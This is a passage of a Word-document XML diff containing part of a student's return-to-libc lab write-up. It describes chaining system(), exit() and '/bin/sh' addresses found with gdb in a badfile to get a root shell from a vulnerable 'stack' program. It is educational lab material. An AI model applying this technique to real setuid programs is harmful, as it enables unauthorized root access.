+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>nalysis and Explanation</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>T</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>his</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> task seems easier after we finished task2.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Firstly, based on task 2, we know where we need to located our first command. (</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>buffer[</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>36]). The thing we need to do in return-to-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>libc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> attack is (1) design the command</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> we need (2) find the command</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> we need (3) locate the</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>m</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> properly in the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>badfile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>1) D</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>esign the command</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> we </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>need</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Because some complex commands may be </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>hard</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to find in the local lib</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>rary</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>, we directly select the simplest set of commands</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>: “</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>system(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>)”, “exit()” and “/bin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>sh</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">”. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">This </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">command set </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">will </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">lead the shell </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>exit the current program and start /bin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>sh</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> as root user.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>2) F</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>ind the command</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> we need</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Then the main part of this task is to find these commands.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Here's a trap</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>, and</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> I made this mistake the first time I did it</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. We need to find the address of command from </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>gdb</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> on a root-user program like stack. Otherwise, the path we find will not be available for a root user. Commands are same, but the addresses are different. </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>So</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> I had a Segmentation fault at my first time.)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>O</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">kay now </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">we </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>run</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>“</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>gdb</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> stack” and then set a breakpoint anywhere. I used “b main” as it is simple. Then just run it.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C9C8084" wp14:editId="7F9343C3">
+            <wp:extent cx="5274310" cy="2082800"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:docPr id="31" name="图片 31"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 11"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId38">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5274310" cy="2082800"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>U</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>se “p system”, “p exit” and “find ‘/bin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>sh</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>’” to find the local address of these commands. If there are</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> more than one choice, just choose the non-stack one (I remember that stack addresses often start with “0xbffff”).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Okay so we have these addresses and they are all non-stack.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>system(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>):</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 0xb7e42da0</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>exit(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
